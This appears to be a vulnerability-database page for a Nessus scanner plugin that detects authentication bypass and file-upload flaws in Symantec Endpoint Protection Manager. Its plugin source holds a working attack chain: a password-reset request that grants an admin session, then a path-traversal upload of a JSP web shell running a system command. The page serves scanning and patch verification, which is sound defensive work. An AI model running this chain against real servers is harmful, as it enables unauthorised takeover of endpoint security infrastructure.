Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) - Nessus

High   Plugin ID: 85351

This page contains detailed information about the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 85351
Name: Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
Filename: symantec_endpoint_prot_mgr_sym15-007_remote.nasl
Vulnerability Published: 2015-07-30
This Plugin Published: 2015-08-13
Last Modification Time: 2021-01-19
Plugin Version: 1.13
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: symantec_endpoint_prot_mgr_detect.nasl
Required KB Items [?]: installed_sw/sep_mgr

Vulnerability Information

Severity: High
Vulnerability Published: 2015-07-30
Patch Published: 2015-07-30
CVE [?]: CVE-2015-1486, CVE-2015-1487, CVE-2015-1489
CPE [?]: cpe:/a:symantec:endpoint_protection_manager

Synopsis

An application running on the remote host is affected by multiple vulnerabilities.

Description

The version of Symantec Endpoint Protection Manager (SEPM) running on the remote host is prior to 12.1 RU6 MP1. It is, therefore, affected by the following vulnerabilities :

- A flaw exists in the password reset functionality that allows a remote attacker, using a crafted password reset action, to generate a new administrative session, thus bypassing authentication. (CVE-2015-1486)

- A flaw exists related to filename validation in a console session that allows an authenticated, remote attacker to write arbitrary files. (CVE-2015-1487)

- An unspecified flaw exists that allows an authenticated, remote attacker to manipulate SEPM services and gain elevated privileges. (CVE-2015-1489)

Nessus attempts to use the authentication bypass flaw in conjunction with the arbitrary file upload and path traversal flaws to test the issue on the remote server. If this test succeeds, it is likely that the application is also affected by other vulnerabilities, including a SQL Injection.

Solution

Upgrade to Symantec Endpoint Protection Manager 12.1 RU6 MP1 or later.

Public Exploits

Target Network Port(s): 9090
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Core Impact, D2 Elliot)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) vulnerability:

  1. Metasploit: exploit/windows/http/sepm_auth_bypass_rce
    [Symantec Endpoint Protection Manager Authentication Bypass and Code Execution]
  2. Exploit-DB: exploits/windows_x86/remote/37812.rb
    [EDB-37812: Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)]
  3. D2 Elliot: symantec_endpoint_protection_manager_file_upload.html
    [Symantec Endpoint Protection Manager File Upload]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:M/Au:S/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score:8.5 (High)
Impact Subscore:10.0
Exploitability Subscore:6.8
CVSS Temporal Score:7.0 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:7.0 (High)

Go back to menu.

Plugin Source

This is the symantec_endpoint_prot_mgr_sym15-007_remote.nasl nessus plugin source code. This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof. 

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(85351);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2015-1486", "CVE-2015-1487", "CVE-2015-1489");
  script_bugtraq_id(76074, 76078, 76094);

  script_name(english:"Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)");
  script_summary(english:"Attempts to exploit the issue.");

  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote host is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Symantec Endpoint Protection Manager (SEPM) running
on the remote host is prior to 12.1 RU6 MP1. It is, therefore,
affected by the following vulnerabilities :

  - A flaw exists in the password reset functionality that
    allows a remote attacker, using a crafted password reset
    action, to generate a new administrative session, thus
    bypassing authentication. (CVE-2015-1486)

  - A flaw exists related to filename validation in a
    console session that allows an authenticated, remote
    attacker to write arbitrary files. (CVE-2015-1487)

  - An unspecified flaw exists that allows an authenticated,
    remote attacker to manipulate SEPM services and gain
    elevated privileges. (CVE-2015-1489)

Nessus attempts to use the authentication bypass flaw in conjunction
with the arbitrary file upload and path traversal flaws to test the
issue on the remote server. If this test succeeds, it is likely that
the application is also affected by other vulnerabilities, including
a SQL Injection.");
  # https://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?135bc3c2");
  # https://support.symantec.com/en_US/article.SYMSA1330.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?647383e8");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Symantec Endpoint Protection Manager 12.1 RU6 MP1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Symantec Endpoint Protection Manager File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/30");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/07/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/08/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:endpoint_protection_manager");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("symantec_endpoint_prot_mgr_detect.nasl");
  script_require_keys("installed_sw/sep_mgr");
  script_require_ports("Services/www", 9090);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

app = 'Symantec Endpoint Protection Manager';
get_install_count(app_name:"sep_mgr", exit_if_zero:TRUE); # Stops port branching

port = get_http_port(default:9090);

install = get_single_install(app_name:"sep_mgr", port:port);

url = build_url(port:port, qs:install["dir"]);
req = make_list();


# The first request takes a bit longer than most requests
http_set_read_timeout(30);
# First we make the request to reset the password
item ="/servlet/ConsoleServlet?ActionType=ResetPassword&UserID=admin&Domain=";
res  = http_send_recv3(
  port         : port,
  method       : "POST",
  item         : item,
  exit_on_fail : TRUE
);
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
req[0] = http_last_sent_request();

time = unixtime();
file = "nessus_"+SCRIPT_NAME - ".nasl" + '-' + time + '.jsp';
dat  = '<%=new java.util.Scanner(Runtime.getRuntime().exec("ipconfig /all").getInputStream()).useDelimiter("\\\\A").next()%>';
item = "/servlet/ConsoleServlet?ActionType=BinaryFile&KnownHosts=.&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/"+file;
res  = http_send_recv3(
  port         : port,
  method       : "POST",
  item         : item,
  data         : dat,
  exit_on_fail : TRUE
);
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
req[1] = http_last_sent_request();

res = http_send_recv3(
  port         : port,
  method       : "GET",
  item         : "/"+file,
  exit_on_fail : TRUE
);
req[2] = http_last_sent_request();
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
output = chomp(res[0]+res[1]+res[2]);

# Final check to make sure we were able to exploit
if("200 OK" >!< output ||  "Subnet Mask" >!< output)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

security_report_v4(
  port         : port,
  request      : req,
  output       : output,
  severity     : SECURITY_HOLE,
  rep_extra    : "Note: This file has not been removed by Nessus and will need to be manually deleted ("+file+")",
  cmd          : "ipconfig /all"
);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/symantec_endpoint_prot_mgr_sym15-007_remote.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\symantec_endpoint_prot_mgr_sym15-007_remote.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/symantec_endpoint_prot_mgr_sym15-007_remote.nasl

Go back to menu.

How to Run

Here is how to run the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) plugin ID 85351.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 85256 - Symantec Endpoint Protection Manager 11.x / 12.x < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
  • 81549 - Symantec Data Center Security Server SQLi (SYM15-001)
  • 81551 - Symantec Data Center Security Server 'environment.jsp' Information Disclosure (SYM15-001)
  • 53209 - Symantec LiveUpdate Administrator < 2.3 CSRF (SYM11-005)
  • 62010 - Symantec Messaging Gateway 9.5.x Multiple Vulnerabilities (SYM12-013)
  • 90919 - Symantec Messaging Gateway 10.x < 10.6.1 Management Console Multiple Vulnerabilities (SYM16-005)
  • 93653 - Symantec Messaging Gateway 10.x < 10.6.2 Multiple Vulnerabilities (SYM16-015) (SYM16-016)
  • 101158 - Symantec Messaging Gateway 10.x < 10.6.3-266 Multiple Vulnerabilities (SYM17-004)
  • 102528 - Symantec Messaging Gateway 10.x < 10.6.3-267 Multiple Vulnerabilities (SYM17-006)
  • 125357 - Symantec (Blue Coat) Reporter Denial of Service vulnerability (SYMSA1280)
  • 59208 - Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)
  • 61435 - Symantec Web Gateway Multiple Script Shell Command Execution (SYM12-011)
  • 61436 - Symantec Web Gateway search.php SQL Injection (SYM12-011)
  • 59209 - Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)
  • 69179 - Symantec Web Gateway < 5.1.1 Multiple Vulnerabilities (SYM13-008)
  • 80118 - Symantec Web Gateway < 5.2.2 Authenticated OS Command Injection (SYM14-016)
  • 94052 - Symantec Web Gateway < 5.2.5 Management Console Command Injection (SYM16-017)
  • 59210 - Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file symantec_endpoint_prot_mgr_sym15-007_remote.nasl version 1.13. For more plugins, visit the Nessus Plugin Library.

Go back to menu.